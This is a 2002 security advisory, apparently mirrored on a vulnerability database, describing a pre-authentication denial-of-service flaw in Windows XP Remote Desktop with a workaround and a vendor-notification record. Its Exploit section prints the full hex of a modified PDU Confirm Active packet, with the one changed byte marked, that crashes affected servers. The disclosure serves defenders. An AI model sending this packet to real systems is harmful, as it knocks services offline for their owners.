Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:3503
HistorySep 18, 2002 - 12:00 a.m.

Microsoft Windows XP Remote Desktop denial of service vulnerability

2002-09-1800:00:00
vulners.com
23
JSON

Vulnerable

Microsoft Windows XP Professional
Microsoft Windows .NET Standard Server Beta 3

Non-vulnerable

Microsoft Windows 2000 Server

Background

Windows XP Professional has a remote denial of service attack when Remote
Desktop is enabled. Remote Desktop is XP Professional's single-user RDP
server (Terminal Services).

Discussion

At the start of the protocol there is a negotiation of client and server
graphics capabilities, in a packet called PDU Confirm Active. A block of
32 bytes in this packet allows the client to disable the drawing commands
that it does not support.

One of these apparently controls whether the Pattern BLT command is sent.
On Windows 2000 Server, disabling this command will make the server send
bitmaps instead of Pattern BLT commands. However, Windows XP Professional
apparently reboots when it tries to render patterns; since this happens
while the login screen is being drawn, this does not require the client to
have logged on or authenticated to the server. This applies to all
versions of the protocol tested (RDP 4.0, 5.0 and 5.1), and it is also
reproducible with Windows .NET Standard Server Beta 3.

Workaround

Disable Remote Desktop (from Control Panel, System, Remote, Remote
Desktop, deselect the option "Allow users to connect remotely to this
computer").

Exploit

Shown below is the unencrypted packet contents for the problematic PDU
Confirm Active packet. The only change is from 01 to 00 on the line
indicated.

c4 01 13 00 f0 03 ea 03 01 00 ea 03 06 00 ae 01
4d 53 54 53 43 00 11 00 00 00 01 00 18 00 01 00
03 00 00 02 00 00 00 00 05 04 00 00 00 00 00 00
00 00 02 00 1c 00 08 00 01 00 01 00 01 00 00 05
00 04 00 00 01 00 01 00 00 00 01 00 00 00 03 00
58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 01 00 14 00 00 00 01 00 00 00
2a 00 01 00 01 01 01 00 00 01 01 01 00 01 00 00 <- was "2a 00 01 01"
00 01 01 01 01 01 01 01 01 00 01 01 01 00 00 00
00 00 a1 06 00 00 00 00 00 00 00 84 03 00 00 00
00 00 e4 04 00 00 13 00 28 00 01 00 00 03 78 00
00 00 78 00 00 00 f3 09 00 80 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00
08 00 06 00 00 00 07 00 0c 00 00 00 00 00 00 00
00 00 05 00 0c 00 00 00 00 00 02 00 02 00 08 00
0a 00 01 00 14 00 15 00 09 00 08 00 00 00 00 00
0d 00 58 00 05 00 08 00 09 08 00 00 04 00 00 00
00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 0c 00 08 00 01 00 00 00
0e 00 08 00 01 00 00 00 10 00 34 00 fe 00 04 00
fe 00 04 00 fe 00 08 00 fe 00 08 00 fe 00 10 00
fe 00 20 00 fe 00 40 00 fe 00 80 00 fe 00 00 01
40 00 00 08 00 01 00 01 03 00 00 00 0f 00 08 00
01 00 00 00 11 00 0c 00 01 00 00 00 00 0a 64 00
14 00 08 00 01 00 00 00 15 00 0c 00 01 00 00 00
00 0a 00 01

References

Section 8.2.5 from T.128 Multipoint application sharing, Series T: Terminals
for telematic services, ITU-T.

Microsoft was notified on 16 April 2002.

Credits

Ben Cohen
[email protected]

Skygate Technology Ltd.
http://www.skygate.co.uk/
+44 (0)20 8542 7856

JSON